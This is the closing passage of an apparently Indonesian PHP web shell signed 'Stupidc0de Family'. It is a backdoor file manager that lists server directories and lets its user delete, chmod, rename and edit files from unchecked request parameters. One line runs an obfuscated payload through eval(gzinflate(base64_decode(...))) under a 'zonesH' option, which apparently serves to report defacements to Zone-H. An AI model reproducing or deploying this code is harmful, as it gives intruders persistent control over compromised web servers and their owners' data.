1917. echo "<font class='rapihbanget'><a href='?path&#61;$path' target='_blank' font-weight:bold; color:#F80;'>$path</a><br></font>";
1918. }
1919. echo "<br /><font class='rapihbanget'>[+] Complete...\n"."<br /></font>";
1920. echo "<font class='rapihbanget'>[+] Monggo Sikat Boz!\n"."<br /></font>";
1921. echo '<br><br></b></body><center>';
1922. }
1923. ///////////////
1924. elseif(isset($_GET['x']) && ($_GET['x'] == 'zonesH')){ echo "<br/><br/>";@eval(gzinflate(base64_decode($zoneH))); "</div>"; }
1925. /////////////
1926.  
1927. /*
1928. File Manager
1929. Dimulai Dari Sini
1930. */
1931. else{
1932. echo '</table><br />';
1933. ////////////////////////////////////////////////////////////////////////
1934. /////////////////////////////////////////////////////////////////////////
1935. echo "<center>";
1936. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
1937. if($_POST['type'] == 'dir'){
1938. if(rmdir($_POST['path'])){
1939. echo '<script>alert("Delete Dir Sukses!");</script>';
1940. }else{
1941. echo '<script>alert("Delete Dir Gagal!");</script>';
1942. }
1943. }elseif($_POST['type'] == 'file'){
1944. if(unlink($_POST['path'])){
1945. echo '<script>alert("Delete File Sukses!");</script>';
1946. }else{
1947. echo '<script>alert("Delete File Gagal!");</script>';
1948. }
1949. }
1950. }
1951. echo '</center>';
1952. $scandir = scandir($path);
1953. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
1954. ';
1955.  
1956. foreach($scandir as $dir){
1957. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
1958. echo "<tr>
1959. <td><a style='color:white; font-family:Homenaje;' href=\"?path=$path/$dir\">$dir</a></td>
1960. <td><center style='color:orange; font-family:Homenaje;'>--</center></td>
1961. <td><center>";
1962. if(is_writable("$path/$dir")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
1963. elseif(!is_readable("$path/$dir")) echo "<font style='color:red; font-family:Homenaje;'>";
1964. echo perms("$path/$dir");
1965. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
1966.  
1967. echo "</center></td>
1968. <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
1969. <select class='bordergaya' name=\"opt\">
1970. <option value=\"\"></option>
1971. <option value=\"delete\">Delete</option>
1972. <option value=\"chmod\">Chmod</option>
1973. <option value=\"rename\">Rename</option>
1974. </select>
1975. <input type=\"hidden\" name=\"type\" value=\"dir\">
1976. <input type=\"hidden\" name=\"name\" value=\"$dir\">
1977. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
1978. <input class='bordergaya' type=\"submit\" value=\"Execute\" />
1979. </form></center></td>
1980. </tr>";
1981. }
1982. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
1983. foreach($scandir as $file){
1984. if(!is_file("$path/$file")) continue;
1985. $size = filesize("$path/$file")/1024;
1986. $size = round($size,3);
1987. if($size >= 1024){
1988. $size = round($size/1024,2).' MB';
1989. }else{
1990. $size = $size.' KB';
1991. }
1992.  
1993. echo "<tr>
1994. <td><a style='color:white; font-family:Homenaje;' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
1995. <td><center style='color:orange; font-family:Homenaje;'>".$size."</center></td>
1996. <td><center>";
1997. if(is_writable("$path/$file")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
1998. elseif(!is_readable("$path/$file")) echo "<font style='color:red; font-family:Homenaje;'>";
1999. echo perms("$path/$file");
2000. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
2001. echo "</center></td>
2002. <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
2003. <select class='bordergaya' name=\"opt\">
2004. <option value=\"\"></option>
2005. <option value=\"delete\">Delete</option>
2006. <option value=\"chmod\">Chmod</option>
2007. <option value=\"rename\">Rename</option>
2008. <option value=\"edit\">Edit</option>
2009. </select>
2010. <input type=\"hidden\" name=\"type\" value=\"file\">
2011. <input type=\"hidden\" name=\"name\" value=\"$file\">
2012. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
2013. <input class='bordergaya' type=\"submit\" value=\"Execute\" />
2014. </form></center></td>
2015. </tr>";
2016. }
2017. echo '</table>
2018. </div>';
2019. }
2020. ///////////////////////////////////////////////////////////////////////
2021. ////////////////////////////////////////////////////////////////////////
2022.  
2023.  
2024.  
2025. ?>
2026. <br/><br/>
2027. <script language="JavaScript"> Year=new Date(); var copyright=Year.getUTCFullYear(); document.write("<font face='Fredericka the Great' size='3px' color='grey'>&copy; Stupidc0de Family " + copyright +"</font> "); </script>
2028. </BODY></html>